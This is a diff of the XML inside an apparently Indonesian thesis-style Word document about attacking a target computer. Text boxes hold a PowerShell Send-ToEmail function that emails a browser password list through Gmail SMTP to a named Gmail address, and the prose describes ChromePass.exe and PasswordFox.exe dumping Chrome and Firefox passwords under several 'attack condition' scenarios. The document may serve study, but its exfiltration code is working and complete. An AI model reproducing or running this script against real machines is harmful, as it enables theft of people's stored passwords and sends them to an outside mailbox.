@@ -32187,25 +28659,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>smtp.EnableSSL</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = $TRUE;</w:t>
+                        <w:t xml:space="preserve">    $message.From = $Username;</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32222,25 +28676,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>smtp.Credentials</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = New-Object System.Net.NetworkCredential($Username, $Password);</w:t>
+                        <w:t xml:space="preserve">    $message.To.Add($email);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32257,25 +28693,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>smtp.send</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>($message);</w:t>
+                        <w:t xml:space="preserve">    $message.Subject = "Browser Password";</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32292,25 +28710,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    write-host "Mail Sent</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>" ;</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> </w:t>
+                        <w:t xml:space="preserve">    $message.Body = "Here the password list";</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32327,25 +28727,135 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
+                        <w:t xml:space="preserve">    $attachment = New-Object Net.Mail.Attachment($attachmentpath);</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>attachment.Dispose</w:t>
+                        <w:t xml:space="preserve">    $message.Attachments.Add($attachment);</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>();</w:t>
+                        <w:t xml:space="preserve">    $smtp = new-object Net.Mail.SmtpClient("smtp.gmail.com", "587");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    $smtp.EnableSSL = $TRUE;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    $smtp.Credentials = New-Object System.Net.NetworkCredential($Username, $Password);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    $smtp.send($message);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    write-host "Mail Sent" ; </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    $attachment.Dispose();</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32379,25 +28889,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>Send-</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>ToEmail  -</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>email "abdulazies55@gmail.com" -attachmentpath $path;</w:t>
+                        <w:t>Send-ToEmail  -email "abdulazies55@gmail.com" -attachmentpath $path;</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -35243,9 +31735,9 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E6D54A6" wp14:editId="3B143F50">
-            <wp:extent cx="4155385" cy="2255152"/>
-            <wp:effectExtent l="19050" t="19050" r="17145" b="12065"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E6D54A6" wp14:editId="619181C1">
+            <wp:extent cx="4076031" cy="2212086"/>
+            <wp:effectExtent l="19050" t="19050" r="20320" b="17145"/>
             <wp:docPr id="42" name="Picture 42"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -35266,7 +31758,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4166581" cy="2261228"/>
+                      <a:ext cx="4094136" cy="2221912"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -35387,7 +31879,23 @@
           <w:bCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Komputer Target Hanya Memiliki Google Chrome</w:t>
+        <w:t xml:space="preserve">Komputer Target </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Tidak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Memiliki Google Chrome</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -35395,14 +31903,240 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="1418"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="123" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="123"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada kondisi penyerangan apabila komputer tidak memiliki </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Google Chrome</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, maka </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">akan terus berjalan namun tidak ada isi dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>ChromePass</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.txt. Sedangkan apabila </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>ChromePass</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.exe dijalankan, maka</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tidak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>akan menampilkan apapun seperti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada Gambar V-14 berikut.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B2FCE8C" wp14:editId="191C04DF">
+            <wp:extent cx="4059936" cy="3057525"/>
+            <wp:effectExtent l="19050" t="19050" r="17145" b="9525"/>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId31"/>
+                    <a:srcRect l="708" t="933" r="1028" b="1585"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4092297" cy="3081896"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="698" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>13</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Tampilan Saat ChromePass.exe Dijalankan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35427,7 +32161,7 @@
           <w:bCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">Komputer Target Hanya Memiliki </w:t>
+        <w:t xml:space="preserve">Komputer Target </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35435,8 +32169,238 @@
           <w:bCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Mozilla Firefox</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Tidak </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Memiliki Mozilla Firefox</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="123" w:name="_Hlk43225207"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pada k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>ondisi penyerangan apabila komputer tidak memiliki Mozilla Firefox,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> maka</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>akan terus berjalan namun tidak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ada</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> isi dari PasswordFox.txt. Sedangkan apabila PasswordFox.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dijalankan, maka akan muncul </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>alert box</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> seperti pada Gambar V-14 berikut.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="123"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B48749B" wp14:editId="4BA9F584">
+            <wp:extent cx="4066415" cy="3065068"/>
+            <wp:effectExtent l="19050" t="19050" r="10795" b="21590"/>
+            <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId32"/>
+                    <a:srcRect l="1235" t="1163" r="686" b="1356"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4089042" cy="3082123"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="698" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>14</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Tampilan Saat PasswordFox.exe Dijalankan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35454,15 +32418,7 @@
           <w:bCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">Komputer Target </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Tidak Memiliki Kedua </w:t>
+        <w:t xml:space="preserve">Komputer Target Tidak Memiliki Kedua </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35474,6 +32430,108 @@
         </w:rPr>
         <w:t>Browser</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada kondisi penyerangan apabila komputer tidak memiliki </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Google Chrome dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mozilla Firefox, maka </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">akan terus berjalan namun tidak ada isi dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ChromePass.txt dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">PasswordFox.txt. Sedangkan apabila </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ChromePass.exe dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">PasswordFox.exe dijalankan, maka </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>tidak menampilkan apapun</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> seperti pada Gambar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">V-13 dan Gambar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">V-14 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>sebelumnya</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
